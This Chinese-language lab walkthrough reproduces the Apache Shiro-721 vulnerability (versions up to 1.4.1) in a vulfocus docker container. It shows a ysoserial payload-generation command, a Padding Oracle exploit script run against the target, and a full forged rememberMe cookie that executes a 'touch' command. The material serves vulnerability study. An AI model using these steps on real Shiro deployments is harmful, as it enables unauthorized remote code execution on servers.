Apache Shiro 存在高危代码执行漏洞。该漏洞是由于Apache Shiro cookie中通过 AES-128-CBC 模式加密的rememberMe字段存在问题,用户可通过Padding Oracle 加密生成的攻击代码来构造恶意的rememberMe字段,并重新请求网站,进行反序列化攻击,最终导致任意代码执行。
影响版本:Apache Shiro <= 1.4.1
环境搭建
docker pull vulfocus/shiro-721
docker run -d -p8080:8080 镜像id
漏洞复现
1.进入登录界面,访问:your-ip:8080/login.jsp
2.登录 Shiro 测试账户获取 Cookie(勾选Remember Me):
(1)输入错误的用户名和密码,http响应页面中会显示出deleteMe的cookie:
(2)使用正确的用户名和密码登录,不会显示deletrMe的cookie
根据以上条件我们的思路是在正常序列化数据(需要一个已知的用户凭证获取正常序列化数据)后利用 Padding Oracle 构造我们自己的数据(Java序列化数据后的脏数据不影响反序列化结果),此时会有两中情况:
- 构造的数据不能通过字符填充验证,返回deleteme;
- 构造的数据可以成功解密通过字符填充验证,之后数据可以正常反序列化,不返回deleteme的cookie.
3.使用正确的用户名密码登录,勾选RememberMe ,进行抓包,放行登录请求包,
登录成功,获取得到Cookie中的rememberMe值
wq02gcYqkxw4aZ9z30n5H005AXc7VR1kzimNdOvoKVV9vFymsYEaob6I1RKtnmf3t7lJfk4M0qFr/PlYMUc9m/QxPZpRiH6cK/rlKk9FcypSysISrYCuAKsdkPqC5eUVTPHxJjbKO28si0CvIVy5gTyCCGFOXA4M9sz7olNCXV1A2F2YQgKmVCZ35s0YjQlDXNoG/4BDeVFLxlY5pluNSgJeVIX8ePR/QvO517LQW2Q0gvd9BHGwY5GYGS68KbgeE4Xm5ttphgt2N0dEkxz9ijsQgFQ6SCw36s7Ia9U9Uwe61rTXVdVEQo70YAOHckMRoQ1BSKMjp85Z/iyEdtnOlYn6FPN9LNQ9Do8SH68eMQcDbw/2ejuGra3OOsPPs6WwxSMoBZ7pS6JGAyr1RCdQEfQpMJl13tLhd6ah4SvY10TtGPdY9kDrhlt7Gx5IXiKzvoLRzqv8idF26Q2AiaGsEp2bfxChA8PYkciihxGKVsOfbBrtF/Vcn1PDIOdVuTuD
4.使用Java反序列化工具 ysoserial 生成 Payload: 这里可以生成在目标靶机根目录中创建test的payload
ysoserial-master-2874a69f61-1.jar下载链接
java -jar ysoserial-master-2874a69f61-1.jar CommonsBeanutils1 "touch /usr/local/tomcat/test" > payload.class
5.通过 Padding Oracle Attack生成 Evil Rememberme cookie:
下载好并解压
cp payload.class shiro_rce_exp-master
cd shiro_rce_exp-master
python shiro_exp.py http://your-ip:8080/account/ 之前获取的RememberMe值 payload.class
python2 shiro_exp.py http://your-ip:8080/account/ 之前获取的RememberMe值 payload.class
6.接着就是漫长的等待。。。。。。。。。
注意: 此 exp 爆破时间较长,建议使用 ysoserial 生成较短的 payload 验证(如: ping 、 touch /tmp/test等),约 30多分钟可生成正确的 rememberme cookie,生成成功后将自动停止运行。
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
7.使用Evil Rememberme cookie 认证进行反序列化攻击:复制该cookie,然后重放一下数据,即可成功执行命令
将之前获取的rememberMe更改为刚才爆破出的结果,并放行
8.检查一下执行结果,可以看到成功创建了一个test文件
docker exec -it 容器id /bin/bash
复现成功